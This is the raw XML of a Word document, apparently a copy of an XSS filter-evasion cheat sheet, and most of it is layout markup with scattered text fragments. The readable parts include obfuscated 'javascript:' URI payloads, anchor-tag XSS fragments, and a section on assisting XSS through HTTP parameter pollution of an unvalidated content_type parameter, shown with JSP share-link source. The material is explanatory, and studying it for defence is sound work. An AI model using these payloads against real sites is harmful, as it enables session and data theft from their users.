                            <a:ext cx="159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8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java&amp;\#x09;script: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8" o:spid="_x0000_s1935" style="position:absolute;left:0;text-align:left;margin-left:157.85pt;margin-top:4.05pt;width:79.6pt;height:9.15pt;z-index:15892480;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="3157,81" coordsize="159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">
                <v:shape id="Freeform 490" o:spid="_x0000_s1936" style="position:absolute;left:3157;top:81;width:1592;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="159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/2IL8A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPzYrCMBC+C75DGMGbpuoiWhtFBXfVm9oHGJqxLTaT&#10;kkStb785LOzx4/vPNp1pxIucry0rmIwTEMSF1TWXCvLbYbQA4QOyxsYyKfiQh82638sw1fbNF3pd&#10;QyliCPsUFVQhtKmUvqjIoB/bljhyd+sMhghdKbXDdww3jZwmyVwarDk2VNjSvqLicX0aBSf3fW7P&#10;s6S56J0/Lh85Pz+zH6WGg267AhGoC//iP/dRK/haxLXxTDwCcv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z/YgvwAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m1571,182l22,182r-4,l,161r,-3l,21,22,,1571,r21,21l1592,161r-18,21l1571,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1571,263;22,263;18,263;0,242;0,239;0,102;22,81;1571,81;1592,102;1592,242;1574,263;1571,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 489" o:spid="_x0000_s1937" type="#_x0000_t202" style="position:absolute;left:3157;top:81;width:159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lYrMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNpYhJ3YgUCwVBGuOhx9fs&#10;S7KYfZtmtxr/fVcQPA4z8w2zXI22EycavHGs4GWagCCunDbcKDiUH88LED4ga+wck4ILeVjljw9L&#10;zLQ7c0GnfWhEhLDPUEEbQp9J6auWLPqp64mjV7vBYohyaKQe8BzhtpOzJJlLi4bjQos9vbdUHfd/&#10;VsH6m4uN+d39fBV1YcoyTXg7Pyo1eRrXbyACjeEevrU/tYLXRQ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WVis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8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java&amp;\#x09;script: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the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(IE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode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Opera):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>converted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>script:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="15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renders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IE,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="2346" w:space="830"/>
            <w:col w:w="5844"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="182" w:lineRule="exact"/>
        <w:ind w:left="154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2669540" cy="116205"/>
                <wp:effectExtent l="5715" t="635" r="1270" b="6985"/>
                <wp:docPr id="484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9540" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4204" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="485" name="Freeform 48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204" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4183 w 4204"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4204"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4204"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4204"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4204"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4204"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4204"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4183 w 4204"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4204 w 4204"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4204 w 4204"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4186 w 4204"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4183 w 4204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204" h="183">
                                <a:moveTo>
                                  <a:pt x="418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183" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4186" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418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20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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId82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http://www.google.com/ogle.com/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"&gt;XSS&lt;/A&gt;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5" o:spid="_x0000_s1938" style="width:210.2pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="420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">
                <v:shape id="Freeform 487" o:spid="_x0000_s1939" style="position:absolute;width:4204;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="420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4mccYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3uqmUsWmriKWQoMgGIvQ22v2&#10;NQnNvg272yT+e1cQPA4z8w2zXA+mER05X1tW8DxJQBAXVtdcKvg6fjwtQPiArLGxTArO5GG9Gj0s&#10;MdW25wN1eShFhLBPUUEVQptK6YuKDPqJbYmj92udwRClK6V22Ee4aeQ0SebSYM1xocKWthUVf/m/&#10;UfD6vZ/vt2V/2r2fzi776bKMi5lSj+Nh8wYi0BDu4Vv7Uyt4WczgeiYeAbm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p4mccYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m4183,182l21,182r-3,l,161r,-3l,21,21,,4183,r21,21l4204,161r-18,21l4183,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4183,182;21,182;18,182;0,161;0,158;0,21;21,0;4183,0;4204,21;4204,161;4186,182;4183,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 486" o:spid="_x0000_s1940" type="#_x0000_t202" style="position:absolute;width:420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bM3sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGIkGjq4hUEAqlMR48PrPP&#10;ZDH7NmZXTf99t1DwOMzMN8xi1dtG3KnzxrGC8SgBQVw6bbhScCi2b1MQPiBrbByTgh/ysFoOXhaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRr4nSSotGo4LNba0qam87G9W&#10;wfrI+Ye5fp2+83NuimKW8Gd6Uep12K/nIAL14Rn+b++0gsk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xsze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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId83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http://www.google.com/ogle.com/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"&gt;XSS&lt;/A&gt;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3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>Assisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="301"/>
      </w:pPr>
      <w:r>
        <w:t>Assume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content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sharing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>flow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t>site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implemented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shown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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"Content"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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includes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>provided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users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includes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link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"Share"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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enables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choose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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favorite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>social</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sharing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>platform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share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on.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Developers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoded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"title"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parameter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"Content"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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reasons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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didn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoded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parameter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prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Pollution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Finally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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decide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since</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>content_type's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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constant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always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integer,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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didn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encode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validate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content_type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"Share"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="159"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Content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Page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Source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Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/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4963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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5400675" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="481" name="Group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675" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="8505" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="482" name="Freeform 484"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="8505" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10098 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8505"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8505"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8505"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8505"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8505"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8505"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8505"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10098 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8505"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10119 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8505"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10119 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8505"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10101 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8505"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10098 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8505"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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505" h="183">
                                <a:moveTo>
                                  <a:pt x="848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484" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8505" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8505" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8487" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="848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Text Box 483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2"/>
                            <a:ext cx="850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/Share?content_type=1&amp;title=&lt;%=Encode.forHtmlAttribute(untrusted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content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title)%&gt;"&gt;Share&lt;/a&gt;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2" o:spid="_x0000_s1941" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:425.25pt;height:9.15pt;z-index:-15566848;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="850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">
                <v:shape id="Freeform 484" o:spid="_x0000_s1942" style="position:absolute;left:1614;top:252;width:8505;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="850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8i6cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKXkQ3ShVJXaUUFBGhNdWDt0f2&#10;mYRm3y7ZNab/3i0IHoeZ+YZZrDpTi5YaX1lWMB4lIIhzqysuFBx/1sM5CB+QNdaWScEfeVgtX3oL&#10;TLW98YHaLBQiQtinqKAMwaVS+rwkg35kHXH0LrYxGKJsCqkbvEW4qeUkSWbSYMVxoURHnyXlv9nV&#10;KCDnzpevaW4Os22y22R7+X0atEr1X7uPdxCBuvAMP9pbreBtPoH/M/EI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fyLpxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8484,182l21,182r-3,l,161r,-3l,21,21,,8484,r21,21l8505,161r-18,21l8484,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8484,434;21,434;18,434;0,413;0,410;0,273;21,252;8484,252;8505,273;8505,413;8487,434;8484,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 483" o:spid="_x0000_s1943" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:850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vRsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WjLaLRVURaEARpjAePz+wz&#10;Wcy+TbOrpv/eLRR6HGbmG2ax6mwt7tR641jBaJiAIC6cNlwqOOafr1MQPiBrrB2Tgh/ysFr2XhaY&#10;avfgjO6HUIoIYZ+igiqEJpXSFxVZ9EPXEEfv4lqLIcq2lLrFR4TbWo6TZCItGo4LFTa0qai4Hm5W&#10;wfrE2Yf53p+/sktm8nyW8G5yVWrQ79ZzEIG68B/+a2+1gvfp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sW9G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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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/Share?content_type=1&amp;title=&lt;%=Encode.forHtmlAttribute(untrusted</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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content</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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title)%&gt;"&gt;Share&lt;/a&gt;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b/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="105"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="13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5014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129540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="1010920"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="478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1010920"/>
                          <a:chOff x="1614" y="204"/>
                          <a:chExt cx="8700" cy="1592"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="479" name="Freeform 481"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="203"/>
                            <a:ext cx="8700" cy="1592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1795 204"/>
                              <a:gd name="T3" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1795 204"/>
                              <a:gd name="T7" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1795 204"/>
                              <a:gd name="T11" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1774 204"/>
                              <a:gd name="T15" fmla="*/ 1774 h 1592"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1771 204"/>
                              <a:gd name="T19" fmla="*/ 1771 h 1592"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 225 204"/>
                              <a:gd name="T23" fmla="*/ 225 h 1592"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 204 204"/>
                              <a:gd name="T27" fmla="*/ 204 h 1592"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 204 204"/>
